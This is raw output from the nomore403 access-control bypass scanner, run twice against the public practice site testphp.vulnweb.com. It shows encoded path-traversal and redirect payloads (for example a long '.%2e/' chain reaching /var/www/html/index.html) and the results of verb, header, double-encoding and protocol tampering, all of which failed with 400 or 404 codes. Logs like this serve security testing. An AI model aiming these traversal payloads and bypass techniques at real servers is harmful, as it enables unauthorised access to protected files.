━━━━━━━━━━━━━━ NOMORE403 CONFIGURATION ━━━━━━━━━━━━━━━━━━
Target: 		http://testphp.vulnweb.com/%2e%2e//google.com
Headers: 		false
Proxy: 			false
User Agent: 		nomore403
Method: 		GET
Payloads folder: 	payloads
Custom bypass IP: 	false
Follow Redirects: 	false
Rate Limit detection: 	false
Status: 		
Timeout (ms): 		6000
Delay (ms): 		0
Techniques: 		verbs, verbs-case, headers, endpaths, midpaths, double-encoding, http-versions, path-case
Unique: 		false
Verbose: 		false

━━━━━━━━━━━━━━━ AUTO-CALIBRATION RESULTS ━━━━━━━━━━━━━━━
[✔] Calibration URI: http://testphp.vulnweb.com/%2e%2e//google.com/calibration_test_123456
[✔] Status Code: 400
[✔] Content Length: 309 bytes

━━━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━━
400 	           309 bytes http://testphp.vulnweb.com/%2e%2e//google.com

━━━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━━
400 	           152 bytes HEAD

━━━━━━━ VERB TAMPERING CASE SWITCHING ━━━━━━━━

━━━━━━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━ DOUBLE-ENCODING ━━━━━━━━━━━━━━
404 	           321 bytes http://testphp.vulnweb.com/%252E.//google.com

━━━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━━
400 	           309 bytes HTTP/1.0

━━━━━━━━━━━━ PATH CASE SWITCHING ━━━━━━━━━━━━━
━━━━━━━━━━━━━━ NOMORE403 CONFIGURATION ━━━━━━━━━━━━━━━━━━
Target: 		http://testphp.vulnweb.com/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
Headers: 		false
Proxy: 			false
User Agent: 		nomore403
Method: 		GET
Payloads folder: 	payloads
Custom bypass IP: 	false
Follow Redirects: 	false
Rate Limit detection: 	false
Status: 		
Timeout (ms): 		6000
Delay (ms): 		0
Techniques: 		verbs, verbs-case, headers, endpaths, midpaths, double-encoding, http-versions, path-case
Unique: 		false
Verbose: 		false

━━━━━━━━━━━━━━━ AUTO-CALIBRATION RESULTS ━━━━━━━━━━━━━━━
[✔] Calibration URI: http://testphp.vulnweb.com/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html/calibration_test_123456
[✔] Status Code: 400
[✔] Content Length: 309 bytes

━━━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━━
400 	           309 bytes http://testphp.vulnweb.com/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html

━━━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━━
400 	           152 bytes HEAD

━━━━━━━ VERB TAMPERING CASE SWITCHING ━━━━━━━━

━━━━━━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━ DOUBLE-ENCODING ━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━━
400 	           309 bytes HTTP/1.0

━━━━━━━━━━━━ PATH CASE SWITCHING ━━━━━━━━━━━━━
